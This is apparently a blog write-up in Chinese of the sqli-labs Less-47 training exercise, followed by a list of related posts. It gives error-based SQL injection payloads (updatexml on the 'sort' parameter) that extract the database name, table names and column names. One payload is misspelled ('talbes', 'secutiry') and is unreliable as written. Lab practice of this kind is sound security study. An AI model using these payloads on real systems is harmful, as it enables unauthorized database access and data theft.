sqli-labs-Less-47

SQLI-LAPS 实验记录

Less-47

这一关与之前的关卡类似,只是闭合的方式不同。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

结果如图所示,返回了数据库名。

后续爆出数据库的表名、列名等方式如下:

  • 爆出表名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.talbes where table_schema='secutiry'),0x7e),1)--+
  • 爆出列名:
php 复制代码
?sort=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
相关推荐
冷凝娇15 小时前
【MySQL】2026总结(二)
数据库·mysql
aaa小葵16 小时前
LangGraph
数据库·人工智能
wWYy.17 小时前
Mysql:Read View
数据库·mysql
—Miss. Z—17 小时前
存储过程、用户定义函数、触发器和游标
数据库·mysql
小码农 - 初18 小时前
MySQL 的约束
mysql
文人sec18 小时前
MySQL事务与索引做了什么?
android·笔记·mysql
Dear~yxy19 小时前
MySQL企业级实战
数据库·mysql
晚安code19 小时前
MySQL 开发规范清单:建表、索引、SQL、ORM 四块一次讲透
数据库·sql·mysql
ERD Online19 小时前
docker-compose 一键部署的 MIT 开源数据库建模平台
数据库·docker·开源
deepseek2319 小时前
OpenAI 首次为自家模型踩刹车:Astra「无法排除关键网络能力」,Preparedness Framework 第一次真的咬人
人工智能·网络安全·ai agent